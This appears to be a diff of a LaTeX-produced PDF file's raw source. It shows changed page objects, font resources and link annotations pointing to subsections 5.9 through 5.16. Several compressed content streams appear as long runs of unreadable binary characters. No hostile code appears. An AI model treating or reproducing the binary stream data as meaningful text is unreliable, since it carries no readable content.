\ú”ºÂ7¡2K–ÍŠƒ8Pf{7pMðbý/”€÷W„nñ{¦Å#³j©Ü`ê…yf6‰)§± x¦ëB— «H,2ŸÚzÞ²IÑÒ#‡túA.~†à}ò‰­e2pë÷4[Å„ó#\wV‰Y -Ñ&š*ÑÝ'~ 2÷™Eu–gå?Æ»Â3ö¦ð!Ÿ0Šíðo-¡iÔaPÐeÒó„˜Ò µ³/ý5ª:ôc°+òýŸ/P«ï"†R5¶Ë$UýL» S¸ý67‚;(H"·­¯÷yM‚ Mщ-ë50Q¤Ð4÷rt÷ßXhà_†DÜl ¡&QÐekñ³ |ØXé 8LoE]}†&&ãn.!Æ7ØÅ’MSWÛ¯`=Þí±6w}öË´ìéiñ[عò«}eÕaz 5ƒ»Dêh*¨)Éý(ÙD_ö"3{ú. !ÅpÁò~¨Žížcal¢,ý=³ß½\Xæ«õ';Ö|YÌ<;]„’—Š¾3qs¤àV$Ö9™²:¨Ê.L1 -g¡Zç^t¤§ö[“yh@hö)¬þ×põŽ„ìgPó)ÉT/¤íwÂ])ôF~=ƒ\Ëèùœ5UÇà©)\É™&£ûoÅ8@Ù½uô±‡ØUgA¥SÕ¦x« _F†l²ë<®«qg†t4¶5®ø¢›ú4÷ÿÇõÕ?š4[Ý -endstream -endobj -576 0 obj << -/Type /Page -/Contents 577 0 R -/Resources 575 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 566 0 R -/Annots [ 559 0 R 567 0 R 568 0 R 569 0 R 570 0 R 571 0 R 579 0 R 572 0 R 573 0 R 574 0 R ] +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 522.239 268.05 533.03] +/A << /S /GoTo /D (subsubsection.5.9.12) >> >> endobj 559 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [158.322 709.878 217.917 720.669] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 503.463 289.741 514.253] +/A << /S /GoTo /D (subsubsection.5.9.13) >> +>> endobj +560 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 484.687 314.559 495.477] +/A << /S /GoTo /D (subsubsection.5.9.14) >> +>> endobj +561 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 465.91 264.564 476.701] +/A << /S /GoTo /D (subsubsection.5.9.15) >> +>> endobj +562 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 449.071 159.733 457.925] +/A << /S /GoTo /D (subsection.5.10) >> +>> endobj +563 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 430.295 250.924 439.149] +/A << /S /GoTo /D (subsubsection.5.10.1) >> +>> endobj +564 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 411.518 260.884 420.372] +/A << /S /GoTo /D (subsubsection.5.10.2) >> +>> endobj +565 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 390.806 244.561 401.596] +/A << /S /GoTo /D (subsection.5.11) >> +>> endobj +566 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 371.476 332.985 383.429] +/A << /S /GoTo /D (subsubsection.5.11.1) >> >> endobj 567 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [428.18 598.536 467.8 609.34] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 353.253 189.78 364.044] +/A << /S /GoTo /D (subsection.5.12) >> >> endobj 568 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [278.327 563.308 368.883 574.112] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 334.477 356.253 345.268] +/A << /S /GoTo /D (subsubsection.5.12.1) >> >> endobj 569 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [273.914 436.092 379.507 446.896] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 315.701 353.874 326.491] +/A << /S /GoTo /D (subsubsection.5.12.2) >> >> endobj 570 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [138.768 392.894 210.753 403.698] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 296.924 227.49 307.715] +/A << /S /GoTo /D (subsection.5.13) >> >> endobj 571 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [506.882 392.894 540.996 403.698] -/Subtype/Link/A<> ->> endobj -579 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 379.265 219.168 390.056] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 278.148 326.511 288.939] +/A << /S /GoTo /D (subsubsection.5.13.1) >> >> endobj 572 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [417.171 153.28 469.445 164.071] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 259.372 384.197 270.163] +/A << /S /GoTo /D (subsubsection.5.13.2) >> >> endobj 573 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [108.342 139.651 187.258 150.497] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 240.596 216.534 251.387] +/A << /S /GoTo /D (subsection.5.14) >> >> endobj 574 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [398.371 126.022 430.589 136.813] -/Subtype/Link/A<> ->> endobj -578 0 obj << -/D [576 0 R /XYZ 72 793.935 null] ->> endobj -42 0 obj << -/D [576 0 R /XYZ 72 760.449 null] ->> endobj -46 0 obj << -/D [576 0 R /XYZ 72 515.139 null] ->> endobj -50 0 obj << -/D [576 0 R /XYZ 72 365.252 null] ->> endobj -54 0 obj << -/D [576 0 R /XYZ 72 297.084 null] +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 221.82 296.575 232.61] +/A << /S /GoTo /D (subsubsection.5.14.1) >> >> endobj 575 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F14 522 0 R /F20 418 0 R /F24 512 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 203.043 298.678 213.834] +/A << /S /GoTo /D (subsubsection.5.14.2) >> >> endobj -588 0 obj << -/Length 3260 -/Filter /FlateDecode ->> -stream -xÚ½ZI—Û6¾÷¯Ðm¨÷"†$Àmn‰Çö8ÏÎÖC^’Z‚$Æ)¤»5¿~ªPTØv6ç"‚X -…ÂW+­«hõòæÝM Ïh¯òd•—Q—åj{ºùé—hµƒþ¯VQ(Ëbõ`gV2+àY¯no¾»ùòîæóI¼*Ã2K²ÕÝžhˆ°éên·ú)HÂõ¦(eðb]fVýÐi³þåî«Ï_Äéd™ÌD%@×.*qÆMÄ º',‘“%)‹0Ê3hˆPÊ’–þÅùlõÕFØnŸ/†¾=©¾Úªº¾¬7BFA¯Mo¨ Ô8wí:Ƀ÷ÕNïˆ÷Ù‘cØ?žù—Ïï˜äaQ”nÎYuê¤{ݙϦ2”Iêæ~ûÍíA!Ã8M—ÏIðß»»oHY(ý¢g-ÌM‚öm¥—6ÈÃ2ö§:jµÓÉãý:MA:Ýäj# -¦ ÕM,Â,)hjvk¸¢ø)NR¸´Ü“ÿÁènóÅA7k`¨_à&‹ÃL×Ü }Ï ½ö-=Ž„t,ôGÜ]uª¶øçnô:à²ã„°Ž0–Á‘fŸ´jŒ£Ð·ÁQõDvÎÕ]\?RÒ$’8NCI„¡i±i€œ×بm*vÕ[Û¶AzMÐоà$ÞÐ {løãà ÇP˼«OêLmuq\ÎÇQ”¥ØÙRo2Ò·$ñ<Ñü$ -„+`¾ÆÕqÜ#§jß~÷YP­-Ãqð+ŠyÛWmƒgeð\9)ã‚ñðâqL¯•¡'²ì6Û·Ã)ŸêWx*<žšá¤; ºë ŒFìæ}¶@* Ké ™ª9Ô(¸áwCÛë5J‹ÞMßÁèÂ*ðïÞb×÷5ãFnŠ4Ÿ‹{¶oò}Ó2 9ºör°½Ö%¥Ú=uÀ#î¨ÙiM£;Õ«Mo¯’ЉxÂ9b[ÿëkHKÝ—<àwÀ%2xaŸÊÌgoBÛu¤+ˆ „%yÇQñµ²zjÄGœÉñJ2N¦f9ãØ[ÜÛ篟?{ÂŽf™ÇƒéU¯OÌ=H[D¹Ð›z¤w<>YFàñD=û¡V:z©š_5žqo¨ åˆ* EðŠ‰W<¤j3#ÛSÝ[Ü%¥ß‘†ÞVû ób5mb$Åa^Ìåã•êç( üĸH°%B‚îâžuÛ«T º¼ž'¶ô¼>²ð¶šdK€Ø`mô ¦Ú†• -‚^Ñ\¹è™c'½Iâ0-ÿŒ[ÿæL{%èKv"¾’ñ¨™º¥2 £ØÃᤫº¤ΛdYÐð üÞ[ç‰×d9©L뽺Î92ÛG†[~7X‰-2 -b;!¶ó@£ñÃ÷á<2oÏU5{í´­R5;d‘„‰Œç(¸¯+{CàÀÉFËxv16â9´€ôÄâ儤‡º¯6h*Ô,"q ²8–Œc È8–¿Å±dÍ‘±?ãØ9hœbò…á{šÔÑ ”/N0$¼[ôJ¥„ߊ¡Ídz$iG´fêÑ Á{gXÁ—ôw`t­)F'QQråÊd ÐÆØlF -ŒV.®£¡E_'E6Ú6ë6¬E5Ù.¡ízŒ£Õv?°£x8¢ØUp -PßÓ‹:Ÿk)XÍ eVuÎa@Ðqt˜gÁ](ƒ6Ç1R”‡ óK\`DÎ~Û— ÈÌ@ã‚ Y›Ëà¨l„nï—†Í0 2À·Q«u¡…ÛAí ²„—_ÓSË›Cò´cT2Æ$sîôã¹n«~¥3}C^šŽ9ržp¸¤Ëµn# ~\’í4xRÅ@vÎCüÆCŒ¦[ÕtÓ…-öß¿ÞèÆŠ¸÷ëœ7žQ¿EàŒ“Oiº¯3²¨„«mvõ¢©ÎÂ2’W(ˆ¼\ ûÍ“:•Bä%~J¥>¨Øw퉘$©Ac¢¨W1¨† u6VØ­âlkզ˃ɰØ$I -›É¹‚T{„„×6 Éh¨x°q·.À°™žæp–31¡w >q_N4-¡œÆævvFe¨Ÿ FC3Õž$xûq{Ä'[|Z6,>± ôdËQžç84m§i˜´ì²pW¦þú"çQpf£ ÿ=¨Í@ιü«Öò`|©LµýŒÚÿ©püòõÝë7Ø’l# ë™îú -óTÀ‹¦.¶œèáEK±‚ˆ HÆ ur7>¨Àô¢ø+'ý¢i-{—S;XŸ/Ýá¡……{¼,ð‹(Œ¥\âCÉ B ѪAÂQäÓJ;J!Ôl‘îUwÐt|½rT%ǼآŒ¥{‹àgj¨ä›˜Ûê(rÁ­‹`·wHdðºÔ›"ÀE¦%y£i¯Þ²û³½‹Ñ-$¦Iš}Ìd‚6ø{ú^c|Ù-Å e(cùqƒ P·ôæ…x¦õIv!ÙËñGØõu¤~ÙÂÇQüÇ9·7ë™vN³W«¾zçê`q(Š«€Æ×F(3âŒÈeFH =Õ쬮]UÓ'ò.°N¹dë‘2ܵ֟d·3 9Ç9¤ãÍ26aïX÷º.ŒB€‹Q6]¢´©5à¿ÐŒ€á‡ ·Ö4Zc(²n»Û¡?=õÀ3ªÃbñ8Î@Àoôïõ&M,¤:fQ?VfyXŒ5TS=^q³X© ¿ø½4Kƒ;k~r,bì$KÂÖfx@∞šSc³¤ZI˜G~x‹2Œ¤k*Ž'UD ¤†§ûPÄgF]ñ‡á.ÝumwÁ÷Úê{JÞ¹4Â؃&Ú0’¡lA²…¬w¬,›Æ™ÖŽ™”á”»& -Ìô¶jnîuOt)›ÄiGí(xȱefõCå6!}ïìn<Þì‹ZÓ½¯ôƒ+'Ñ(ƒ‹:ëÖÆبa\xÀø—` ›yg9M’: )2êg\gCdŠþ¡äÌ$ÓzlÌŒ#j¹áxI¬ÎâµÛäG)! ùUG“èdøÍmh–Í5`ÊYuX\B7…Ý^L0sGJogó®>Kõ &‘{0as&‘3˜pˆsö<¥ÎSëqùAè ?ȃÍÒǹ$*ÂLzo™Ò€\Há¾ -¡ŸdåØO~WÚ*›MDì7’¶äF£Š¶¤E)NÚxÃYJo¾PóKB 8ú’†îI(Jù÷ùsˆÃztÜ-µ±´‡­Ü™Aêæº=à (‹ÃÐqP³^}ýŠFý} EÅÅðóLÅSm|<¯ÿÁø¤‡³ (6R¬™©=³LŸ¦F.pÖ^ùm{:yßVûïRšòV¬«\ÉfVSqÆÁÌKLsº`pªFÏü›,W£qK®Å$¾(¬sÅqQω+ ÿÚÊð“ǶÖóåœ|åA U\ƒ×›Òº=Ÿ´•:Rˆœ;ãyqµ” ¹Ûá~bðÇ©vÅåªoɧ}Z™½â/²‡é­¹lîØ}õ«¼s‘<ÄC³Ð£eг³2í`K!ö³ -~QŒVˆþpCÈèüÏŒï_Þ¬~²sßè^*-N¹·£ÒÙÀ§—?µÿíB–˜N¹ŠcÈ~ÒÄÊ-‘aóð,ü:PðëÁ 0Ùº;w•ûÖᬰm`râ“ö2³Ö~üÈS·Ãf˜yÃæãþ‰ë±×©(†ý.²cYàæ-Váœê[WXäÖÍØ´}3íÞ&&ø£:^Ϲ {Ö"gG -#CId}±Þ ðšé³ª‚ï6Óë-±ÿLÉm–Œ×(ÎwQ„wLäyGVq,š?}ù0­²0¾çþÅþÔ<ùÚ&Yîsë %0ëCØ̤Üh&!ƒáÔˆ -¸ß¡ÙN<˱ èVÆtF÷ÃàO³Éw'[tcMB]Â"L‘H‘M«óðf#<ß\¨Æ_X&'‹l /ÀÙdQBßÌŠŒ¿jò6кþlVP¥Ÿ\<EÊ&’IÞÜÆ¡FT㸩E´Á]O?v S4&:±ryßä31þ«§MjÇvîm3 ëO2Ûrë$¹ÅTÖ¼B‚@nƒÏ…jMSÈI­' ïÕZ[3ĘÎ{È4ÝzÓÖíá2zkoé¯:K[{~wó›Ç ÿ -endstream -endobj -587 0 obj << -/Type /Page -/Contents 588 0 R -/Resources 586 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 566 0 R -/Annots [ 580 0 R 581 0 R 582 0 R 583 0 R 584 0 R 585 0 R 590 0 R ] +576 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 184.267 276.101 195.058] +/A << /S /GoTo /D (subsubsection.5.14.3) >> +>> endobj +577 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 165.491 258.892 176.282] +/A << /S /GoTo /D (subsubsection.5.14.4) >> +>> endobj +578 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 148.652 144.696 157.506] +/A << /S /GoTo /D (subsection.5.15) >> +>> endobj +579 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 129.875 173.013 138.729] +/A << /S /GoTo /D (subsubsection.5.15.1) >> >> endobj 580 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [342.73 207.818 390.982 218.608] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 111.099 332.543 119.953] +/A << /S /GoTo /D (subsubsection.5.15.2) >> >> endobj 581 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [411.677 207.818 433.866 218.608] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 92.323 215.842 101.177] +/A << /S /GoTo /D (subsubsection.5.15.3) >> >> endobj 582 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [177.568 135.157 276.266 145.962] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 73.547 252.529 82.401] +/A << /S /GoTo /D (subsubsection.5.15.4) >> +>> endobj +587 0 obj << +/D [585 0 R /XYZ 71 806.89 null] +>> endobj +584 0 obj << +/Font << /F21 503 0 R /F15 499 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +612 0 obj << +/Length 2292 +/Filter /FlateDecode +>> +stream +xÚíYYsÜ6~ׯ˜GN•Hó¯¼9ÑÊ¥”'‘\»[v 3Ã1HZžŸntƒsJq©v;ë—œF_7šþl9óg¯Î>œðïÏ‚YÎÒÜ÷‚<ŸÍÙ»ßüY ã?Î|OäÙìÁ¬jf"É࿞ݜýröýíÙ‹Ë0˜å^ž„ÉìvA4"/âÙm9{çÞÜÍrá\µó(tÝÍ]ø/Çb¨ºvþÛí/.ƒxg¿H"Ïá³[àŠ3Ÿ9%.õ’ÙýõÕÙÌaìiÈ"§m0{ñÜM„pÞ®çn˜9¥ENÿ¡näzðì›ø™¬Š<Ç¿Ø÷ÿœ¿/ý¼)A;QþGZñgnyišì¨#!uÜÈ9hããU»¬ZuNÖß-LTSgC³-m_©½sqq¡ä0j#èÈwÆFÀ‡‘±ªÆT±wB§0Š:U¼‘ƒ’úwº“<¢e»d:Fk0ÛÃ]™9æ –Ö>`šr +ÞJ{˜W-½Ö\òA›bÐòüÔ%;®ÒY 况Š9`}æ6“–‘‚]ŽÇ£ˆsßØ-Ë ‘7fÛåc[*]o&Š\×3í~ÂbúlN9X©Ââà8L[Š®i`º§yéᵆÕTt$½ R ÌÂì9Ðþhä#yñ8¸Ý½›žE׶dM½Çˆ"fAàåq2DÂ˳©nà@êWõa¬´jÁJÿ’Ä^èçûPE±LKEš©í-JžoCÎwfßÏ€Èö(\ÃÎs"ÀU×rÓʦ*h¬ƒŒ3Žôr·Ó•âŠáöH* ®µšs–Z6 KV€‰¶Ë²YŒ~"snWt“Øiä½¹Iÿ¸²ò”Œu |QžÁ¹¥ZS* -ã»-f[̳íþ#eÃ)J¢”Pvtm½¡iMŠê(±™…Ý«k´pE@;€Ždž;}ê–+¹f7ðpÎÁe/žÇ‘—f6†…[ „³$šâÊ9N@Ίè³¥lML)sm+ß?´5@>§iÔ>T`ÏÐ?eb jpܤ¨Ì•¡ÛWƒ:¶·tbpèÛÑRk +ÄBÓ@M6ö––)ÙWJŸÓTCå…‘«›dž’}é¾úéí‹×týñÙ\Yõƒ®îÆé«CŒÐ¡ØÚÇ úgĈÍÃ+#\4„u`n2‹#Ðv°d][a S†•]ò‚Žêæ¯eqÊfÞÜü æã€Ò̈0öM¬ÇÀZ•Š¦­¡¹–çàËà‰%/h™ÎJáZM=ˆiÀzê/ÐÐJ–›í±øO2QtútG“ã¦Î?ÁG»)€#„s&ZH>x×à¶çÌ3 u.õXGÁ8LŸ5z5Œk×2k>)_š‹M7>áÆ,9§ÞËë‹Dð·' óWƒl«‘#‚µ7q·ó$ÚEi­êÊ*ÒÅ°ROù (Z‘ªàþýºÆëTlˆ—è#€¦ê%…u…øÍ—Š!œ,™ ¸˜Á®\ÈðjHí¦ïi1&gÆÉÂ>RælÇx¬ïü{ž pšk•5hÎ 3… %ÂøÃg†ñWÓ3&1Ý4™ê!ÐzZ\°`Ïlåó\:–»¥h ì%õè;¤…k¨úøæ±çÇ©E×È‹O!pæ…Id×}=BwL^»Œ*íÌÄÑÕ×?óÐiE!ÊàY²ŒÂ}78JEŒæÒcÍÁŒ¢,­­>Œ& CçØ©¯N!î Ãh&ä@ÚñõAx¯î´Ô›Ïð“+Ìb3̳qÉH©5ªº¦L:D'µ¹uJ`¸0Zí.ÁÄ9Kv3^¤·ƒ)•™>V†Y·á®nãÐ ÒI·nyJµ ‡`Z²ÍÀ±Î ‚ sŠ&vàQkóê°ù5}¬ä³pWúÎ +Ãëu]Æ%)!wÃ$öD.ö]jœù‚‹ûÉaòî¶øØñ'õ»‰¥„lk 'HÝyáw`Ù‚+5Ê>ŒíäÉôÅÖ/DœE¤Rl,»)½& †-ê»=c¡‹ýŒ&‚Ÿúlýïý =ܳ«(lM.x ¶rWéò»Ç \€ +F$ ‚]ëÞOñ„PÞ›{tP§9`Û%Ü0ðâ<Û×U¡»¾[°Xéë=>šž¼GÌ÷0wà+Qb€_ñ)Nùe°†@É9?K;öVMöDZÿÿ¸=ûG*uô +endstream +endobj +611 0 obj << +/Type /Page +/Contents 612 0 R +/Resources 610 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 504 0 R +/Annots [ 583 0 R 588 0 R 589 0 R 590 0 R 591 0 R 592 0 R 593 0 R 594 0 R 595 0 R 596 0 R 597 0 R 598 0 R 599 0 R 600 0 R 601 0 R 602 0 R 603 0 R 604 0 R 605 0 R 606 0 R 607 0 R 608 0 R ] >> endobj 583 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [284.187 135.157 351.257 145.962] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 747.553 208.898 758.344] +/A << /S /GoTo /D (subsubsection.5.15.5) >> >> endobj -584 0 obj << +588 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [359.178 135.157 486.539 145.962] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 728.777 311.571 739.568] +/A << /S /GoTo /D (subsubsection.5.15.6) >> >> endobj -585 0 obj << +589 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [507.684 135.157 540.996 145.962] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 711.938 265.035 720.792] +/A << /S /GoTo /D (subsubsection.5.15.7) >> >> endobj 590 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 121.528 132.017 132.319] -/Subtype/Link/A<> ->> endobj -589 0 obj << -/D [587 0 R /XYZ 72 793.935 null] ->> endobj -58 0 obj << -/D [587 0 R /XYZ 72 194.877 null] ->> endobj -586 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F14 522 0 R /F27 521 0 R /F22 421 0 R /F24 512 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -597 0 obj << -/Length 2976 -/Filter /FlateDecode ->> -stream -xÚ½ZYsÛ8~÷¯Ð[¤ªˆC¼æmrMíÔz6³vö%™JÑ$dsÂCCRvüï·Ýà!SÊV’Í‹4@èþðõAû«Û•¿úõâï ¿þJ¬"¹ŠßI²Êª‹÷ú«ä¿­|O'ñêÁΪV:Œá·\]]üqñâúâ§7R¬/ e¸ºÞÑÊKT°ºÎWï×ÒÛlãD¯ßl’pmÒþКnóçõo?½Áä1Äž¯a]ûðqÊ…Ï;t¿ðŒž<³ÕZy~BCyZ'ôì_D³§Þ„-å^tuØï7[¯›¶ßl•Ö}C¿­éÛÂÜo`ÌðÈ7^½¸¼¢#ÌN.Täùp|^ú&­kÓ.Ui[<íùÂJ¡'Õ ‹Ît]ÑÔðê$ZºÅ%Cé)¹'Ò:_Ú^âé8ps²CÛšz£äº§•ó´OoÒÎ,¬G^û)ê]ÓVi{ÓêØ__;Å îP—%.²Qäi¯¶BÁ‰c~qŠGQj–]C­l#£5¬!¨õ‰¤ÅŽ~IíС4)‚æu¼ý ç°ÓÒ¼*ê¢ëÛ´oxþ?ð_½ø~„wŒ“º([)¼ ùvli_Xýà/(ćÊÀ¶Ì’©|á 5 i<’…=ùÒ Š@Éâ °JÆEí2ÏhÉ}Úuˆ…¦ÍIr—vw‹÷TˆÐÍ}ÝkÚâ¾(Ííâ±ïÿûîJ©$öDtv‡@¾§ MÈdãŠåâ‚Jza|ñv©p¸YSªzqs¾%nÚyü _zQ|7ª8B>Ý;\„h¸Þù¡‚g´§°Ã»}J;BèéÑS¼Žql¯#¼ðá®) IìQJÝ6­o Iš‰è^ 57é †×@X=ã‘ ºkŠÌ…~Ä|#Ž-A—aè ?šü$!Á®‰ô蔶cÙŽú¨@]Öc€ëóKafV¬6Õ&[¥CŸ ™¸ˆØ‡X×ÞþO[B‚ô 4™#ÁX>ˆ’«@A ÄñwY¥{:f,œ]t¼»£½bN„-¼‘a‹CVSïû9i/7pLˆ ?þpWMñj†zuñ÷Á°yÂÚ Ô8Ûÿ¡3G0®ÿ‚:‹~Fz -}¬ü0w {VÓŒ›´Ó;ŽãðcÙ¤¼Jše’ÞA±¢‹xÒàt½$¤®Ô^‚® òŠ$².2X_o ùJ?m„ þ½GY?ëÝéŒ Ž/ñ}>þUSávCEÞ:´ܱh¦ÈŽdikh!…°/'±E#=M°IÏÍ}Jž€¼ö%¥í-g§ÿþõbõÞÎû_–ßo$ÌŒV–¬ÆІX dwˆûv!DÊH†±Î¹ž*— üiå5àfF“k¾gSŸS97sÖ?}.Xáõç=¬6pÛ°Ðtv"aã¢)˜§BwJuÇç|èdùiê7?>¢Bä—@ÔZõ"»{”âgJÈ#Ř€Ò½Ó±è2[¸ À“¦ÝæC±aâÝ¡¶`XŒ]cí Îôgˆ¥OjÁ­ÔRR ˆ¢¬©öEÉãÝ@<§vsd®ÿ²IlOOÁBõ°£ -!Is| ¨³úè¹lL€í‡¢¿#lùÎfÆ%Z…{ýêÅ%¼üŠ:¸÷©"ð‘Q¶ÛznìŽÖæSòcî˜vª;&œqá¦àëJÃAÞ5ÓìÝ«7H_íqØ­YA(º¡›IóÙd‡ÞäÏ(µÙãî],«Ö­©Ü=¼»é÷Fµª¡0ñCƒ=œDsbKh$û@„tÐ@@D¸'@BäìGê~—p¬„'£a#tÇí,˜u2K抆«-)¯%ñ¡ÎM[>ZÞÀ>¿aÁö![³»bq¼MúÝÓz ¥ÙõøÆ4yˆI çò8œíøvcS‚þ¶5ƒtQâe‘µ]Êvy©i™h¨'ƒ“¡ÖMù!†5ú]pÈíMÑ·iûH]¸q˜¿ãAŠ”4`LDeHôÙ$“-51VÎÓ–gÃ…ÞúÅú…ò‚±vbý¢tõLhLù…Ky¾:¢¨A±ø*9 -öŸ8hâZ¡M€Q‘à—‚h‚ œlqOqq~¿.`'¸YÃÛq±@NŠ%áñ{ –yÆ%l tœ‹€ßª<ÿª'è沤㴷xÞ#”3ƒéW‰OCС;,KX³Ú3GÛò>·"¯¤¿öljr#±kÏbà`ÏFEÎè+ðt88øÏûY•ww³[a ¶'2žHNiBrÈŠÒZ¼¡B| . ˆźì@’/FܨęçHVt.­‰ ÎÑsXµ\0æ©ù¼l yËDJÌ¥Ù¯çÇ¡X—ÁÍ2Œ%a§;jNÜè1?ÏlàâX|?v6"j~¦ÃL½èî((³ÑD^@HÛf·½¡¢lŠfË8íúå[»ô²©iàiimz$=[–6†W$“ÙXÏ" -&WÁˆ˜¿xk3#ÑÅÚqÞì3ˆ-¿QZ´à\¥ï…ãw)÷ÉXÊnl¹•ÚÎ7á?7·h~Š])COÈ1`º|¤’€_´C8’´ï)8ù´øÙTxÑøÙÍr²8¸¾¼òã­ÆÇ:Ü8ù\Ü-Šè0)ÛJE^œÅBï~ “t—ÌN×!lýGObŠJ±e=6F„³GD}[\™NwŽÛÕ©lxfgC*Øš£&´¿@´ -1ùÕÍGÒÇnÝÜY,4K^mr´·,” -®ß·‡úèóû}}}ñ_}rŽ7 -endstream -endobj -596 0 obj << -/Type /Page -/Contents 597 0 R -/Resources 595 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 566 0 R -/Annots [ 591 0 R 599 0 R 592 0 R 593 0 R ] +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 693.162 170.44 702.016] +/A << /S /GoTo /D (subsection.5.16) >> >> endobj 591 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [324.21 483.962 540.996 494.753] -/Subtype/Link/A<> ->> endobj -599 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [71.004 470.334 103.181 481.124] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 674.385 173.013 683.239] +/A << /S /GoTo /D (subsubsection.5.16.1) >> >> endobj 592 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [198.079 470.334 495.973 481.124] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 655.609 173.013 664.463] +/A << /S /GoTo /D (subsubsection.5.16.2) >> >> endobj 593 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [459.599 103.029 504.476 114.982] -/Subtype/Link/A<> ->> endobj -598 0 obj << -/D [596 0 R /XYZ 72 793.935 null] ->> endobj -62 0 obj << -/D [596 0 R /XYZ 72 531.215 null] ->> endobj -595 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F14 522 0 R /F24 512 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -615 0 obj << -/Length 2511 -/Filter /FlateDecode ->> -stream -xÚÍYY“Û¸~Ÿ_¡‡T™ª²8 ^~‹ã#»åÙõŒ“MÙ[)H„$ÖP¤L€3V~}ºÑEQœqj½qí‹Ôlâêî¯/Í636{{ñù"€6 